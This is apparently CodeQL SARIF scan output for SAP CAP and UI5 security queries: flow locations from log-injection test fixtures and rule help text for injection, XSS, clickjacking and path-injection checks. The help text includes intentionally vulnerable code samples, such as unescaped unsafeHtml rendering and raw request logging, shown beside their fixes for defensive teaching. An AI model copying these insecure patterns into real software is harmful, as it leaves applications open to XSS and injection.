"artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 
17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + } ], + "newlineSequences" : [ "\r\n", "\n", "
", "
" ], + "columnKind" : "utf16CodeUnits", + "properties" : { + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + }, + "metricResults" : [ { + "rule" : { + "id" : "js/summary/lines-of-code", + "index" : 101, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-code", + "value" : 2973 + }, { + "rule" : { + "id" : "js/summary/lines-of-user-code", + "index" : 102, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-user-code", + "value" : 2973, + "baseline" : 0 + } ], + "semmle.formatSpecifier" : "sarif-latest" + } + } ] +}{ + "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", + "version" : "2.1.0", + "runs" : [ { + "tool" : { + "driver" : { + "name" : "CodeQL", + "organization" : "GitHub", + "semanticVersion" : "2.15.1", + "notifications" : [ { + "id" : "cli/expected-extracted-files/javascript", + "name" : "cli/expected-extracted-files/javascript", + "shortDescription" : { + "text" : "Expected extracted files" + }, + "fullDescription" : { + "text" : "Files appearing in the source archive that are expected to be extracted." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "expected-extracted-files", "telemetry" ], + "languageDisplayName" : "JavaScript" + } + }, { + "id" : "cli/expected-extracted-files/python", + "name" : "cli/expected-extracted-files/python", + "shortDescription" : { + "text" : "Expected extracted files" + }, + "fullDescription" : { + "text" : "Files appearing in the source archive that are expected to be extracted." 
+ }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "expected-extracted-files", "telemetry" ], + "languageDisplayName" : "Python" + } + } ], + "rules" : [ ] + }, + "extensions" : [ { + "name" : "advanced-security/javascript-sap-cap-queries", + "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "rules" : [ { + "id" : "js/cap-sql-injection", + "name" : "js/cap-sql-injection", + "shortDescription" : { + "text" : "CQL query built from user-controlled sources" + }, + "fullDescription" : { + "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/cap-sql-injection", + "kind" : "path-problem", + "name" : "CQL query built from user-controlled sources", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cap-log-injection", + "name" : "js/cap-log-injection", + "shortDescription" : { + "text" : "CAP Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", + "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" + }, + "properties" : { + "tags" : [ "security" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/cap-log-injection", + "kind" : "path-problem", + "name" : "CAP Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "generated/extension-pack", + "semanticVersion" : "0.0.0", + "locations" : [ { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", + "description" : { + "text" : "The QL pack root directory." 
+ } + }, { + "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "advanced-security/javascript-sap-ui5-queries", + "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "rules" : [ { + "id" : "js/ui5-xss", + "name" : "js/ui5-xss", + "shortDescription" : { + "text" : "UI5 Client-side cross-site scripting" + }, + "fullDescription" : { + "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, 
{ + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. 
If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
